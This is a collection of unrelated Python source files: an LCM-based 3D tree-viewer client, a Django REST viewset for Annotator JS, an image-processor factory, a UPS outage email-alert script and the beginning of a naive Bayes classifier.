        """Return the JSON-ready dict; head fields only when a head is drawn."""
        serialized = {
            "type": "line",
            "points": [list(p) for p in self.points],
            "radius": self.radius,
            "closed": self.closed,
        }
        if self.start_head or self.end_head:
            serialized.update(
                start_head=self.start_head,
                end_head=self.end_head,
                head_radius=self.head_radius,
                head_length=self.head_length,
            )
        return serialized
class LazyTree(object):
    """A tree whose child nodes spring into existence on first access.

    Each node carries a list of geometries and a local 4x4 transform."""
    __slots__ = ["geometries", "transform", "children"]

    def __init__(self, geometries=None, transform=np.eye(4)):
        self.geometries = [] if geometries is None else geometries
        self.transform = transform
        self.children = defaultdict(lambda: LazyTree())

    def __getitem__(self, item):
        return self.children[item]

    def getdescendant(self, path):
        """Walk (and lazily create) the node at *path*, a sequence of keys."""
        node = self
        for key in path:
            node = node[key]
        return node

    def descendants(self, prefix=tuple()):
        """Return the key-paths of all descendant nodes, depth-first."""
        paths = []
        for key, child in list(self.children.items()):
            childpath = prefix + (key,)
            paths.append(childpath)
            paths.extend(child.descendants(childpath))
        return paths
class CommandQueue(object):
    """Pending viewer commands, bucketed by kind, as sets of tree paths."""

    def __init__(self):
        self.empty()

    def isempty(self):
        return not (self.settransform or self.setgeometry or self.delete)

    def empty(self):
        """Reset all three command buckets."""
        self.settransform = set()
        self.setgeometry = set()
        self.delete = set()
class Visualizer(object):
    """
    A Visualizer is a lightweight object that contains a CoreVisualizer and a
    path. The CoreVisualizer does all of the work of storing geometries and
    publishing LCM messages. By storing the path in the Visualizer instance,
    we make it easy to do things like store or pass a Visualizer that draws to
    a sub-part of the viewer tree.
    Many Visualizer objects can all share the same CoreVisualizer.
    """
    __slots__ = ["core", "path"]
    def __init__(self, path=None, lcm=None, core=None):
        if core is None:
            core = CoreVisualizer(lcm)
        if path is None:
            path = tuple()
        else:
            if isinstance(path, str):
                # Accept "/a/b" strings; a leading slash yields an empty
                # first component, in which case all empties are dropped.
                path = tuple(path.split("/"))
                if not path[0]:
                    path = tuple([p for p in path if p])
        self.core = core
        self.path = path
    def setgeometry(self, geomdata):
        """
        Set the geometries at this visualizer's path to the given
        geomdata (replacing whatever was there before).
        geomdata can be any one of:
          * a single BaseGeometry
          * a single GeometryData
          * a collection of any combinations of BaseGeometry and GeometryData
        """
        self.core.setgeometry(self.path, geomdata)
        return self
    def settransform(self, tform):
        """
        Set the transform for this visualizer's path (and, implicitly,
        any descendants of that path).
        tform should be a 4x4 numpy array representing a homogeneous transform
        """
        self.core.settransform(self.path, tform)
    def delete(self):
        """
        Delete the geometry at this visualizer's path.
        """
        self.core.delete(self.path)
    def __getitem__(self, path):
        """
        Indexing into a visualizer returns a new visualizer with the given
        path appended to this visualizer's path.
        """
        # Note: shares self.core, so all views publish over one connection.
        return Visualizer(path=self.path + (path,),
                          lcm=self.core.lcm,
                          core=self.core)
    def start_handler(self):
        """
        Start a Python thread that will subscribe to messages from the remote
        viewer and handle those responses. This enables automatic reloading of
        geometry into the viewer if, for example, the viewer is restarted
        later.
        """
        self.core.start_handler()
class CoreVisualizer(object):
    # Owns the geometry tree, the pending-command queue and the LCM
    # connection; Visualizer instances delegate all real work here.
    def __init__(self, lcm=None):
        if lcm is None:
            lcm = LCM()
        self.lcm = lcm
        self.client_id = CLIENT_ID_FACTORY.new_client_id()
        self.tree = LazyTree()
        self.queue = CommandQueue()
        # When True, every mutation publishes immediately (see _maybe_publish).
        self.publish_immediately = True
        self.lcm.subscribe(self._response_channel(),
                           self._handle_response)
        self.handler_thread = None
    def _request_channel(self):
        return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
    def _response_channel(self):
        return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
    def _handler_loop(self):
        while True:
            self.lcm.handle()
    def start_handler(self):
        # Idempotent: at most one daemon handler thread is ever started.
        if self.handler_thread is not None:
            return
        self.handler_thread = threading.Thread(
            target=self._handler_loop)
        self.handler_thread.daemon = True
        self.handler_thread.start()
    def _handle_response(self, channel, msgdata):
        msg = viewer2_comms_t.decode(msgdata)
        data = json.loads(msg.data.decode())
        if data["status"] == 0:
            pass
        elif data["status"] == 1:
            # Viewer reports missing geometry (e.g. it restarted): re-queue
            # everything we know about for retransmission.
            for path in self.tree.descendants():
                self.queue.setgeometry.add(path)
                self.queue.settransform.add(path)
        else:
            raise ValueError(
                "Unhandled response from viewer: {}".format(msg.data.decode()))
    def setgeometry(self, path, geomdata):
        # Accept a single BaseGeometry, an iterable of geometries, or a
        # single GeometryData; normalize to a list before loading.
        if isinstance(geomdata, BaseGeometry):
            self._load(path, [GeometryData(geomdata)])
        elif isinstance(geomdata, Iterable):
            self._load(path, geomdata)
        else:
            self._load(path, [geomdata])
    def _load(self, path, geoms):
        # Wrap bare geometries in GeometryData before storing in the tree.
        converted_geom_data = []
        for geom in geoms:
            if isinstance(geom, GeometryData):
                converted_geom_data.append(geom)
            else:
                converted_geom_data.append(GeometryData(geom))
        self.tree.getdescendant(path).geometries = converted_geom_data
        self.queue.setgeometry.add(path)
        self._maybe_publish()
    def settransform(self, path, tform):
        self.tree.getdescendant(path).transform = tform
        self.queue.settransform.add(path)
        self._maybe_publish()
    def delete(self, path):
        if not path:
            # Empty path deletes the whole tree.
            self.tree = LazyTree()
        else:
            t = self.tree.getdescendant(path[:-1])
            if path[-1] in t.children:
                del t.children[path[-1]]
        self.queue.delete.add(path)
        self._maybe_publish()
    def _maybe_publish(self):
        if self.publish_immediately:
            self.publish()
    def publish(self):
        if not self.queue.isempty():
            data = self.serialize_queue()
            msg = to_lcm(data)
            self.lcm.publish(self._request_channel(), msg.encode())
            self.queue.empty()
    def serialize_queue(self):
        # Flatten the queued commands into the treeviewer_json payload dict.
        delete = []
        setgeometry = []
        settransform = []
        for path in self.queue.delete:
            delete.append({"path": path})
        for path in self.queue.setgeometry:
            geoms = self.tree.getdescendant(path).geometries or []
            setgeometry.append({
                "path": path,
                "geometries": [geom.serialize() for geom in geoms]
            })
        for path in self.queue.settransform:
            settransform.append({
                "path": path,
                "transform": serialize_transform(
                    self.tree.getdescendant(path).transform)
            })
        return {
            "utime": int(time.time() * 1e6),
            "delete": delete,
            "setgeometry": setgeometry,
            "settransform": settransform
        }
if __name__ == '__main__':
    # Demo script exercising the API against a running viewer.
    # We can provide an initial path if we want
    vis = Visualizer(path="/root/folder1")
    # Start a thread to handle responses from the viewer. Doing this enables
    # the automatic reloading of missing geometry if the viewer is restarted.
    vis.start_handler()
    vis["boxes"].setgeometry(
        [GeometryData(Box([1, 1, 1]),
                      color=np.random.rand(4),
                      transform=transformations.translation_matrix([x, -2, 0]))
         for x in range(10)])
    # Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
    # implemented, so these sub-visualizers come into being as soon as they're
    # asked for
    vis = vis["group1"]
    box_vis = vis["box"]
    sphere_vis = vis["sphere"]
    box = Box([1, 1, 1])
    geom = GeometryData(box, color=[0, 1, 0, 0.5])
    box_vis.setgeometry(geom)
    sphere_vis.setgeometry(Sphere(0.5))
    sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
    vis["test"].setgeometry(Triad())
    vis["test"].settransform(transformations.concatenate_matrices(
        transformations.rotation_matrix(1.0, [0, 0, 1]),
        transformations.translation_matrix([-1, 0, 1])))
    vis["triad"].setgeometry(Triad())
    # Setting the geometry preserves the transform at that path.
    # Call settransform(np.eye(4)) if you want to clear the transform.
    vis["test"].setgeometry(Triad())
    # bug, the sphere is loaded and replaces the previous
    # geometry but it is not drawn with the correct color mode
    vis["test"].setgeometry(Sphere(0.5))
    # Spin the whole subtree about z, one full revolution in ~1 second.
    for theta in np.linspace(0, 2 * np.pi, 100):
        vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
        time.sleep(0.01)
    #vis.delete()
|
import time
import json
import os
import tempfile
import threading
from collections import defaultdict, Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
def __init__(self):
self.pid = os.getpid()
self.counter = 0
def new_client_id(self):
self.counter += 1
return "py_{:d}_{:d}".format(self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
msg = viewer2_comms_t()
msg.utime = data["utime"]
msg.format = "treeviewer_json"
msg.format_version_major = 1
msg.format_version_minor = 0
msg.data = bytearray(json.dumps(data), encoding='utf-8')
msg.num_bytes = len(msg.data)
return msg
def serialize_transform(tform):
return {
"translation": list(transformations.translation_from_matrix(tform)),
"quaternion": list(transformations.quaternion_from_matrix(tform))
}
class GeometryData(object):
__slots__ = ["geometry", "color", "transform"]
def __init__(self, geometry, color=(1., 1., 1., 1.), transform=np.eye(4)):
self.geometry = geometry
self.color = color
self.transform = transform
def serialize(self):
params = self.geometry.serialize()
params["color"] = list(self.color)
params["transform"] = serialize_transform(self.transform)
return params
class BaseGeometry(object):
def serialize(self):
raise NotImplementedError()
class Box(BaseGeometry):
__slots__ = ["lengths"]
def __init__(self, lengths=[1,1,1]):
self.lengths = lengths
def serialize(self):
return {
"type": "box",
"lengths": list(self.lengths)
}
class Sphere(BaseGeometry):
__slots__ = ["radius"]
def __init__(self, radius=1):
self.radius = radius
def serialize(self):
return {
"type": "sphere",
"radius": self.radius
}
class Ellipsoid(BaseGeometry):
__slots__ = ["radii"]
def __init__(self, radii=[1,1,1]):
self.radii = radii
def serialize(self):
return {
"type": "ellipsoid",
"radii": list(self.radii)
}
class Cylinder(BaseGeometry):
__slots__ = ["length", "radius"]
def __init__(self, length=1, radius=1):
self.length = length
self.radius = radius
def serialize(self):
return {
"type": "cylinder",
"length": self.length,
"radius": self.radius
}
class Triad(BaseGeometry):
__slots__ = ["tube", "scale"]
def __init__(self, scale=1.0, tube=False):
self.scale = scale
self.tube = tube
def serialize(self):
return {
"type": "triad",
"scale": self.scale,
"tube": self.tube
}
class PointCloud(BaseGeometry):
__slots__ = ["points", "channels"]
def __init__(self, points, channels={}):
self.points = points
self.channels = channels
def serialize(self):
return {
"type": "pointcloud",
"points": [list(p) for p in self.points],
"channels": {name: [list(c) for c in values] for (name, values) in self.channels.items()}
}
class PolyLine(BaseGeometry):
def __init__(self, points, radius=0.01, closed=False,
start_head=False, end_head=False,
head_radius=0.05, head_length=None):
self.points = points
self.radius = radius
self.closed = closed
self.start_head = start_head
self.end_head = end_head
self.head_radius = head_radius
self.head_length = head_length if head_length is not None else head_radius
def serialize(self):
data = {
"type": "line",
"points": [list(p) for p in self.points],
"radius": self.radius,
"closed": self.closed
}
if self.start_head or self.end_head:
data["start_head"] = self.start_head
data["end_head"] = self.end_head
data["head_radius"] = self.head_radius
data["head_length"] = self.head_length
return data
class LazyTree(object):
__slots__ = ["geometries", "transform", "children"]
def __init__(self, geometries=None, transform=np.eye(4)):
if geometries is None:
geometries = []
self.geometries = geometries
self.transform = transform
self.children = defaultdict(lambda: LazyTree())
def __getitem__(self, item):
return self.children[item]
def getdescendant(self, path):
t = self
for p in path:
t = t[p]
return t
def descendants(self, prefix=tuple()):
result = []
for (key, val) in list(self.children.items()):
childpath = prefix + (key,)
result.append(childpath)
result.extend(val.descendants(childpath))
return result
class CommandQueue(object):
    """Accumulates the paths of pending settransform/setgeometry/delete commands."""
    def __init__(self):
        # Start with all three pending-command sets empty.
        self.empty()
    def isempty(self):
        """Return True when no command of any kind is pending."""
        pending = self.settransform or self.setgeometry or self.delete
        return not pending
    def empty(self):
        """Discard every pending command."""
        self.settransform = set()
        self.setgeometry = set()
        self.delete = set()
class Visualizer(object):
    """
    A Visualizer is a lightweight object that contains a CoreVisualizer and a
    path. The CoreVisualizer does all of the work of storing geometries and
    publishing LCM messages. By storing the path in the Visualizer instance,
    we make it easy to do things like store or pass a Visualizer that draws to
    a sub-part of the viewer tree.
    Many Visualizer objects can all share the same CoreVisualizer.
    """
    __slots__ = ["core", "path"]
    def __init__(self, path=None, lcm=None, core=None):
        # core: shared CoreVisualizer; one is created (using `lcm`) if absent.
        # path: tuple of path components, or a "/"-separated string.
        if core is None:
            core = CoreVisualizer(lcm)
        if path is None:
            path = tuple()
        else:
            if isinstance(path, str):
                # Split "a/b/c" into components.
                path = tuple(path.split("/"))
            if not path[0]:
                # Drop empty components (e.g. from a leading "/").
                path = tuple([p for p in path if p])
        self.core = core
        self.path = path
    def setgeometry(self, geomdata):
        """
        Set the geometries at this visualizer's path to the given
        geomdata (replacing whatever was there before).
        geomdata can be any one of:
          * a single BaseGeometry
          * a single GeometryData
          * a collection of any combinations of BaseGeometry and GeometryData

        Returns self, so calls can be chained.
        """
        self.core.setgeometry(self.path, geomdata)
        return self
    def settransform(self, tform):
        """
        Set the transform for this visualizer's path (and, implicitly,
        any descendants of that path).
        tform should be a 4x4 numpy array representing a homogeneous transform
        """
        self.core.settransform(self.path, tform)
    def delete(self):
        """
        Delete the geometry at this visualizer's path.
        """
        self.core.delete(self.path)
    def __getitem__(self, path):
        """
        Indexing into a visualizer returns a new visualizer with the given
        path appended to this visualizer's path.
        """
        # The new Visualizer shares this one's core (and LCM instance).
        return Visualizer(path=self.path + (path,),
                          lcm=self.core.lcm,
                          core=self.core)
    def start_handler(self):
        """
        Start a Python thread that will subscribe to messages from the remote
        viewer and handle those responses. This enables automatic reloading of
        geometry into the viewer if, for example, the viewer is restarted
        later.
        """
        self.core.start_handler()
class CoreVisualizer(object):
    """
    Owns the geometry tree and the LCM channels used to talk to the remote
    tree viewer.  Mutations are queued and (by default) published
    immediately after every call.
    """
    def __init__(self, lcm=None):
        # lcm: optional LCM instance; a default one is created if omitted.
        if lcm is None:
            lcm = LCM()
        self.lcm = lcm
        # Unique client id so several visualizer processes can share a bus.
        self.client_id = CLIENT_ID_FACTORY.new_client_id()
        self.tree = LazyTree()
        self.queue = CommandQueue()
        # When True, each setgeometry/settransform/delete publishes at once.
        self.publish_immediately = True
        self.lcm.subscribe(self._response_channel(),
                           self._handle_response)
        self.handler_thread = None
    def _request_channel(self):
        # Channel on which commands are sent to the viewer.
        return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
    def _response_channel(self):
        # Channel on which the viewer acknowledges our commands.
        return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
    def _handler_loop(self):
        # Blocks forever servicing LCM messages; run on a daemon thread.
        while True:
            self.lcm.handle()
    def start_handler(self):
        """Start (at most once) a daemon thread servicing viewer responses."""
        if self.handler_thread is not None:
            return
        self.handler_thread = threading.Thread(
            target=self._handler_loop)
        self.handler_thread.daemon = True
        self.handler_thread.start()
    def _handle_response(self, channel, msgdata):
        # status 0: command applied.  status 1: the viewer (re)started and
        # lost its state, so re-enqueue the whole tree for re-publication.
        msg = viewer2_comms_t.decode(msgdata)
        data = json.loads(msg.data.decode())
        if data["status"] == 0:
            pass
        elif data["status"] == 1:
            for path in self.tree.descendants():
                self.queue.setgeometry.add(path)
                self.queue.settransform.add(path)
        else:
            raise ValueError(
                "Unhandled response from viewer: {}".format(msg.data.decode()))
    def setgeometry(self, path, geomdata):
        """Replace the geometries at *path*; accepts a geometry, a
        GeometryData, or an iterable of either."""
        if isinstance(geomdata, BaseGeometry):
            self._load(path, [GeometryData(geomdata)])
        elif isinstance(geomdata, Iterable):
            self._load(path, geomdata)
        else:
            self._load(path, [geomdata])
    def _load(self, path, geoms):
        # Normalize every entry to GeometryData before storing in the tree.
        converted_geom_data = []
        for geom in geoms:
            if isinstance(geom, GeometryData):
                converted_geom_data.append(geom)
            else:
                converted_geom_data.append(GeometryData(geom))
        self.tree.getdescendant(path).geometries = converted_geom_data
        self.queue.setgeometry.add(path)
        self._maybe_publish()
    def settransform(self, path, tform):
        """Set the 4x4 homogeneous transform stored at *path*."""
        self.tree.getdescendant(path).transform = tform
        self.queue.settransform.add(path)
        self._maybe_publish()
    def delete(self, path):
        """Delete the subtree at *path*; an empty path clears the whole tree."""
        if not path:
            self.tree = LazyTree()
        else:
            t = self.tree.getdescendant(path[:-1])
            if path[-1] in t.children:
                del t.children[path[-1]]
        self.queue.delete.add(path)
        self._maybe_publish()
    def _maybe_publish(self):
        # Honors the publish_immediately flag set in __init__.
        if self.publish_immediately:
            self.publish()
    def publish(self):
        """Serialize and send all queued commands, then clear the queue."""
        if not self.queue.isempty():
            data = self.serialize_queue()
            msg = to_lcm(data)
            self.lcm.publish(self._request_channel(), msg.encode())
            self.queue.empty()
    def serialize_queue(self):
        """Build the JSON-compatible dict describing every queued command."""
        delete = []
        setgeometry = []
        settransform = []
        for path in self.queue.delete:
            delete.append({"path": path})
        for path in self.queue.setgeometry:
            # A path may have been deleted after being queued; treat missing
            # geometries as an empty list.
            geoms = self.tree.getdescendant(path).geometries or []
            setgeometry.append({
                "path": path,
                "geometries": [geom.serialize() for geom in geoms]
            })
        for path in self.queue.settransform:
            settransform.append({
                "path": path,
                "transform": serialize_transform(
                    self.tree.getdescendant(path).transform)
            })
        return {
            # Microsecond timestamp for the viewer.
            "utime": int(time.time() * 1e6),
            "delete": delete,
            "setgeometry": setgeometry,
            "settransform": settransform
        }
if __name__ == '__main__':
    # Demo script: exercises the Visualizer API against a running viewer.
    # We can provide an initial path if we want
    vis = Visualizer(path="/root/folder1")
    # Start a thread to handle responses from the viewer. Doing this enables
    # the automatic reloading of missing geometry if the viewer is restarted.
    vis.start_handler()
    # Ten unit boxes in a row along x, each with a random RGBA color.
    vis["boxes"].setgeometry(
        [GeometryData(Box([1, 1, 1]),
                      color=np.random.rand(4),
                      transform=transformations.translation_matrix([x, -2, 0]))
         for x in range(10)])
    # Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
    # implemented, so these sub-visualizers come into being as soon as they're
    # asked for
    vis = vis["group1"]
    box_vis = vis["box"]
    sphere_vis = vis["sphere"]
    box = Box([1, 1, 1])
    geom = GeometryData(box, color=[0, 1, 0, 0.5])
    box_vis.setgeometry(geom)
    sphere_vis.setgeometry(Sphere(0.5))
    sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
    vis["test"].setgeometry(Triad())
    vis["test"].settransform(transformations.concatenate_matrices(
        transformations.rotation_matrix(1.0, [0, 0, 1]),
        transformations.translation_matrix([-1, 0, 1])))
    vis["triad"].setgeometry(Triad())
    # Setting the geometry preserves the transform at that path.
    # Call settransform(np.eye(4)) if you want to clear the transform.
    vis["test"].setgeometry(Triad())
    # bug, the sphere is loaded and replaces the previous
    # geometry but it is not drawn with the correct color mode
    vis["test"].setgeometry(Sphere(0.5))
    # Spin the whole group1 subtree once around the z axis (~1 s animation).
    for theta in np.linspace(0, 2 * np.pi, 100):
        vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
        time.sleep(0.01)
    #vis.delete()
|
en
| 0.859218
|
A Visualizer is a lightweight object that contains a CoreVisualizer and a path. The CoreVisualizer does all of the work of storing geometries and publishing LCM messages. By storing the path in the Visualizer instance, we make it easy to do things like store or pass a Visualizer that draws to a sub-part of the viewer tree. Many Visualizer objects can all share the same CoreVisualizer. Set the geometries at this visualizer's path to the given geomdata (replacing whatever was there before). geomdata can be any one of: * a single BaseGeometry * a single GeometryData * a collection of any combinations of BaseGeometry and GeometryData Set the transform for this visualizer's path (and, implicitly, any descendants of that path). tform should be a 4x4 numpy array representing a homogeneous transform Delete the geometry at this visualizer's path. Indexing into a visualizer returns a new visualizer with the given path appended to this visualizer's path. Start a Python thread that will subscribe to messages from the remote viewer and handle those responses. This enables automatic reloading of geometry into the viewer if, for example, the viewer is restarted later. # We can provide an initial path if we want # Start a thread to handle responses from the viewer. Doing this enables # the automatic reloading of missing geometry if the viewer is restarted. # Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily # implemented, so these sub-visualizers come into being as soon as they're # asked for # Setting the geometry preserves the transform at that path. # Call settransform(np.eye(4)) if you want to clear the transform. # bug, the sphere is loaded and replaces the previous # geometry but it is not drawn with the correct color mode #vis.delete()
| 2.192466
| 2
|
annotations/views.py
|
connectik/digital-manifesto
| 0
|
6628503
|
<reponame>connectik/digital-manifesto
from __future__ import absolute_import, unicode_literals
from rest_framework import permissions, viewsets, views, parsers, renderers, filters
from . import models, serializers
class AnnotationRenderer(renderers.JSONRenderer):
    """
    Format our JSON response so Annotator JS will recognize it.
    """
    def render(self, data, accepted_media_type=None, renderer_context=None):
        # Annotator JS expects list payloads wrapped as {"rows": [...]}.
        payload = {'rows': data} if isinstance(data, (list, tuple)) else data
        return super(AnnotationRenderer, self).render(
            payload,
            accepted_media_type=accepted_media_type,
            renderer_context=renderer_context,
        )
class AnnotationViewSet(viewsets.ModelViewSet):
    """
    View to handle all Annotator JS requests
    """
    # Defer the (potentially large) related text body while still joining
    # the text object in one query.
    queryset = models.Annotation.objects.defer('text_object__text').select_related('text_object')
    serializer_class = serializers.AnnotationSerializer
    # NOTE(review): annotations are world-readable and world-writable here —
    # confirm that is intended.
    permission_classes = (permissions.AllowAny,)
    parser_classes = (parsers.JSONParser,)
    filter_backends = (filters.DjangoFilterBackend,)
    # Allow filtering by the annotated text object and by source URI.
    filter_fields = ('text_object_id', 'uri')
    renderer_classes = (AnnotationRenderer, renderers.BrowsableAPIRenderer)
class AnnotationIndexAPI(views.APIView):
    """
    Placeholder view for use in `urlpatterns` so we can `reverse()` our API endpoint
    """
    # Intentionally empty: only the URL name is needed, not any behavior.
    pass
|
from __future__ import absolute_import, unicode_literals
from rest_framework import permissions, viewsets, views, parsers, renderers, filters
from . import models, serializers
class AnnotationRenderer(renderers.JSONRenderer):
"""
Format our JSON response so Annotator JS will recognize it.
"""
def render(self, data, accepted_media_type=None, renderer_context=None):
if isinstance(data, (list, tuple)):
data = {'rows': data}
return super(AnnotationRenderer, self).render(data, accepted_media_type=accepted_media_type, renderer_context=renderer_context)
class AnnotationViewSet(viewsets.ModelViewSet):
"""
View to handle all Annotator JS requests
"""
queryset = models.Annotation.objects.defer('text_object__text').select_related('text_object')
serializer_class = serializers.AnnotationSerializer
permission_classes = (permissions.AllowAny,)
parser_classes = (parsers.JSONParser,)
filter_backends = (filters.DjangoFilterBackend,)
filter_fields = ('text_object_id', 'uri')
renderer_classes = (AnnotationRenderer, renderers.BrowsableAPIRenderer)
class AnnotationIndexAPI(views.APIView):
"""
Placeholder view for use in `urlpatterns` so we can `reverse()` our API endpoint
"""
pass
|
en
| 0.78222
|
Format our JSON response so Annotator JS will recognize it. View to handle all Annotator JS requests Placeholder view for use in `urlpatterns` so we can `reverse()` our API endpoint
| 2.106239
| 2
|
ipapi/class_pipelines/ip_factory.py
|
tpmp-inra/ipso_cli
| 0
|
6628504
|
import inspect
import sys
import pkgutil
import ipapi.class_pipelines as class_pipelines
from ipapi.file_handlers.fh_base import file_handler_factory
from ipapi.base.ip_abstract import BaseImageProcessor
from ipapi.tools.common_functions import get_module_classes
def ipo_factory(
    file_path, options=None, force_abstract: bool = False, data_base=None, scale_factor=1
):
    """Build the image processor best suited to *file_path*.

    When force_abstract is True, or when no pipeline class claims the file,
    a plain BaseImageProcessor is returned.
    """
    if force_abstract:
        return BaseImageProcessor(
            file_path, options, database=data_base, scale_factor=scale_factor
        )
    # Gather every concrete pipeline class, deduplicated.
    candidates = set(
        get_module_classes(
            package=class_pipelines,
            class_inherits_from=BaseImageProcessor,
            remove_abstract=True,
        )
    )
    # Temporary file handler used only to probe experiment/robot metadata.
    handler = file_handler_factory(file_path, data_base)
    probe = dict(experiment=handler.experiment, robot=handler.__class__.__name__)
    # Hand the file to the first pipeline class that claims it.
    for candidate in candidates:
        if callable(getattr(candidate, "can_process", None)) and candidate.can_process(probe):
            return candidate(
                file_path, options, database=data_base, scale_factor=scale_factor
            )
    return BaseImageProcessor(
        file_path, options, database=data_base, scale_factor=scale_factor
    )
|
import inspect
import sys
import pkgutil
import ipapi.class_pipelines as class_pipelines
from ipapi.file_handlers.fh_base import file_handler_factory
from ipapi.base.ip_abstract import BaseImageProcessor
from ipapi.tools.common_functions import get_module_classes
def ipo_factory(
file_path, options=None, force_abstract: bool = False, data_base=None, scale_factor=1
):
if force_abstract:
return BaseImageProcessor(
file_path, options, database=data_base, scale_factor=scale_factor
)
else:
# Build unique class list
ipt_classes_list = get_module_classes(
package=class_pipelines,
class_inherits_from=BaseImageProcessor,
remove_abstract=True,
)
# Create temporary image wrapper to detect experiment
fh = file_handler_factory(file_path, data_base)
# Select able class
ipt_classes_list = list(set(ipt_classes_list))
for cls in ipt_classes_list:
if callable(getattr(cls, "can_process", None)) and cls.can_process(
dict(experiment=fh.experiment, robot=fh.__class__.__name__)
):
return cls(
file_path, options, database=data_base, scale_factor=scale_factor
)
return BaseImageProcessor(
file_path, options, database=data_base, scale_factor=scale_factor
)
|
en
| 0.650826
|
# Build unique class list # Create temporary image wrapper to detect experiment # Select able class
| 2.166619
| 2
|
onbattery.py
|
bzsparks/apcupsd-alert
| 0
|
6628505
|
<filename>onbattery.py
#!/usr/bin/env python3
import smtplib
import sqlite3
import json
from datetime import datetime
from email.mime.text import MIMEText
from contextlib import closing
def GetRequired():
    """Load and return the configuration dict stored in required.json."""
    with open('required.json', 'r') as config_file:
        return json.load(config_file)
def SetOutageInfo(now):
    """Record an on-battery event in apcupsd.sqlite.

    Inserts *now* into apcd_onbattery and points apcd_last_onbattery
    (rowid 1) at the new row's ID.  Errors are rolled back and printed.
    """
    # Fix: initialize before the try so the except/finally blocks cannot hit
    # a NameError when sqlite3.connect() itself raises.
    con = None
    try:
        con = sqlite3.connect('apcupsd.sqlite')
        with closing(con.cursor()) as cur:
            # Fix: use parameterized queries instead of str.format to avoid
            # SQL injection and quoting problems; str(now) preserves the
            # value the old format-string code stored.
            cur.execute('INSERT INTO apcd_onbattery (onbattery) VALUES (?)',
                        (str(now),))
            cur.execute('SELECT ID FROM apcd_onbattery WHERE onbattery=?',
                        (str(now),))
            lastID = cur.fetchone()[0]
            cur.execute('UPDATE apcd_last_onbattery SET last_onbattery=? WHERE rowid=1',
                        (lastID,))
            con.commit()
    except sqlite3.Error as e:
        if con:
            con.rollback()
        print('Error {0}:'.format(e.args[0]))
    finally:
        if con:
            con.close()
def SendGmailMsg(required, now):
    """Email an on-battery alert through Gmail over SSL.

    required: config dict with 'sender', 'password' (app-specific password),
              and 'recipients' (list of addresses).
    now: outage timestamp, interpolated into the message body.
    """
    gmailAddress = required['sender']
    # Fix: the credential line was a redacted placeholder (`<PASSWORD>[...]`),
    # which is a syntax error; read the app-specific password from config.
    gmailPassword = required['password']
    fromSender = gmailAddress
    toRecipients = required['recipients']
    msg_subject = 'ALERT: Home UPS Power Failure'
    msg_text = 'Home is now on battery power. {0}'.format(now)
    msg = MIMEText(msg_text)
    msg['Subject'] = msg_subject
    msg['From'] = fromSender
    msg['To'] = ", ".join(toRecipients)
    # Port is an integer (was the string '465').
    s = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    try:
        s.login(gmailAddress, gmailPassword)
        s.sendmail(fromSender, toRecipients, msg.as_string())
    finally:
        # Always close the SMTP session, even if login/sendmail fails.
        s.quit()
#Main
if __name__ == "__main__":
    # Record the outage timestamp, then notify the configured recipients.
    now = datetime.now()
    required = GetRequired()
    SetOutageInfo(now)
    SendGmailMsg(required, now)
|
<filename>onbattery.py
#!/usr/bin/env python3
import smtplib
import sqlite3
import json
from datetime import datetime
from email.mime.text import MIMEText
from contextlib import closing
def GetRequired():
with open('required.json', 'r') as fin:
return json.loads(fin.read())
def SetOutageInfo(now):
try:
con = sqlite3.connect('apcupsd.sqlite')
with closing(con.cursor()) as cur:
cur.execute('INSERT INTO apcd_onbattery (onbattery) VALUES (\'{0}\')'.format(now))
cur.execute('SELECT ID FROM apcd_onbattery WHERE onbattery=\'{0}\''.format(now))
lastID = cur.fetchone()[0]
cur.execute('UPDATE apcd_last_onbattery SET last_onbattery=(\'{0}\') WHERE rowid=1'.format(lastID))
con.commit()
except sqlite3.Error as e:
if con:
con.rollback()
print('Error {0}:'.format(e.args[0]))
finally:
if con:
con.close()
def SendGmailMsg(required, now):
gmailAddress = required['sender']
gmailPassword = <PASSWORD>['password'] #App Specific Password
fromSender = gmailAddress
toRecipients = required['recipients']
msg_subject = 'ALERT: Home UPS Power Failure'
msg_text = 'Home is now on battery power. {0}'.format(now)
msg = MIMEText(msg_text)
msg['Subject'] = msg_subject
msg['From'] = fromSender
msg['To'] = ", ".join(toRecipients)
s = smtplib.SMTP_SSL('smtp.gmail.com', '465')
s.login(gmailAddress, gmailPassword)
s.sendmail(fromSender, toRecipients, msg.as_string())
s.quit()
#Main
if __name__ == "__main__":
now = datetime.now()
required = GetRequired()
SetOutageInfo(now)
SendGmailMsg(required, now)
|
en
| 0.372344
|
#!/usr/bin/env python3 #App Specific Password #Main
| 2.487731
| 2
|
naive_bayes_mixture.py
|
devin040/messageSA
| 0
|
6628506
|
<gh_stars>0
# naive_bayes.py
# ---------------
# Licensing Information: You are free to use or extend this projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to the University of Illinois at Urbana-Champaign
#
# Created by <NAME> (<EMAIL>) on 09/28/2018
# Modified by <NAME> 02/02/2020
"""
This is the main entry point for Part 2 of this MP. You should only modify code
within this file for Part 2 -- the unrevised staff files will be used for all other
files and classes when code is run, so be careful to not modify anything else.
"""
import numpy as numpy
import math
from collections import Counter
import nltk
#import pudb; pu.db
from tqdm import tqdm
def naiveBayesMixture(train_set, train_labels, dev_set, imessages, imessage_batch, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):
    """
    train_set - List of list of words corresponding with each movie review
    example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set
    Then train_set := [['like','this','movie'], ['i','fall','asleep']]
    train_labels - List of labels corresponding with train_set
    example: Suppose I had two reviews, first one was positive and second one was negative.
    Then train_labels := [1, 0]
